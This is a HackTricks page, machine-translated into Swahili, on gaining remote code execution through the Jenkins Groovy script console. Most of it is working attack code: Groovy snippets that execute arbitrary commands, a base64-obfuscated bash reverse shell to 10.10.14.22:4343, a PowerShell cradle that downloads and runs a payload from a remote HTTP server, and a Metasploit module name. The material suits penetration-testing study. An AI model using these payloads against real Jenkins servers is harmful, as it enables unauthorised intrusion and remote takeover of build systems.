Jenkins RCE with Groovy Script

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Jenkins RCE na Skripti ya Groovy

Hii ni kimya kidogo kuliko kuunda mradi mpya kwenye Jenkins

  1. Nenda kwenye njia_jenkins/script

  2. Ndani ya sanduku la maandishi ingiza skripti

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

Unaweza kutekeleza amri kwa kutumia: cmd.exe /c dir

Katika linux unaweza kufanya hivi: "ls /".execute().text

Ikiwa unahitaji kutumia alama za nukuu na nukuu moja ndani ya maandishi. Unaweza kutumia """PAYLOAD""" (nukuu tatu za mara mbili) kutekeleza mzigo.

Scripting ya groovy nyingine muhimu ni (badilisha [WEKA AMRI]):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Reverse shell kwa linux

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Reverse shell kwa windows

Unaweza kuandaa seva ya HTTP na reverse shell ya PS na kutumia Jeking kuidownload na kuitekeleza:

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Skripti

Unaweza kiotomatisha mchakato huu kwa skripti hii.

Unaweza kutumia MSF kupata shell ya nyuma:

msf> use exploit/multi/http/jenkins_script_console
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Last updated